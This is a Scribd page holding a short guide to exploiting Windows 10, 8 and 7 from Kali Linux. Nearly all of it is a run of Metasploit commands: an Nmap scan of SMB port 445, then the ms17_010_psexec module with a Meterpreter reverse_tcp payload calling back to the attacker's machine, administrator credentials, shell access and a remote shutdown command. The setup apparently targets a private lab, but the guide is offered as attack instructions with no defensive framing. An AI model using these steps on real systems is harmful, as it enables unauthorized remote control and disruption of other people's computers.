Scribd
Upload
306 views

Exploiting Windows10 8 7

This document provides instructions for exploiting vulnerabilities in Windows 10, 8, and 7 using Kali Linux. It describes using the Metasploit framework to exploit the MS17-010 EternalBlue vulnerability via SMB to gain remote code execution on a Windows 10 system. The steps include scanning the target with Nmap, using Metasploit to configure the exploit with the correct payload, LHOST, LPORT, RHOST, and credentials, and executing the exploit to obtain a Meterpreter session and shell access on the target system.

Uploaded by

Ashok Kumar
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
306 views

Exploiting Windows10 8 7

This document provides instructions for exploiting vulnerabilities in Windows 10, 8, and 7 using Kali Linux. It describes using the Metasploit framework to exploit the MS17-010 EternalBlue vulnerability via SMB to gain remote code execution on a Windows 10 system. The steps include scanning the target with Nmap, using Metasploit to configure the exploit with the correct payload, LHOST, LPORT, RHOST, and credentials, and executing the exploit to obtain a Meterpreter session and shell access on the target system.

Uploaded by

Ashok Kumar
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 2

How to explot windows 10 / 8 / 7 :-

1. Exploiting windows 10 using ms17_010_psexec kali linux 2018 :-

i. Victim machine windows 10 ip address = 192.168.100.81


ii. Attacker machine kali linux ip address =
From kali linux machine:-
i. nmap –sV –p 445 <windows 10 victim machine ip address>
ii. 445 tcp port is open in windows machine
iii. Kali linux machine console :-
root@kali~: msfconsole
msf> search ms17_010_psexec
msf> use exploit/windows/smb/ms17_010_psexec
msf exploit(windows/smb/ms17_010_psexec) > info
msf exploit(windows/smb/ms17_010_psexec) > options
msf exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_psexec) > set LHOST <kali linux machine ip address>
msf exploit(windows/smb/ms17_0101_psexec)> set LPORT 4444
msf exploit(windows/smb/ms17_010_psexec)> set RHOST 192.168.100.81 (windows victim machine ip )
msf exploit(windows/smb/ms17_010_psexec)> set SMBUser pente
(so the above line SMBUser <pente> is nothing but the administorator
username of the windows target machine and you can find this user
name by just visiting the windows machine and finding out issuing the
command like c:\users\pente> net user) …..
Msf exploit(windows/smb/ms17_010_psexec)> set SMBPass p3intest
Msf exploit(windows/smb/ms17_010_psexec)> options
Msf exploit(windows/smb/ms17_010_psexec)> exploit
So if the exploit is successful you will be getting the meterpreter session
Meterpreter> sysinfo
Meterpreter> shell
So issuing the shell command will get you the shell
C:\windows\system32> ipconfig
C:\windows\system32> exit
meterpreter> ps
meterpreter> getuid
meterpreter>getpid
meterpreter> shell
C:\windows\system32> shutdown –s –t 10 -c

iii.

You might also like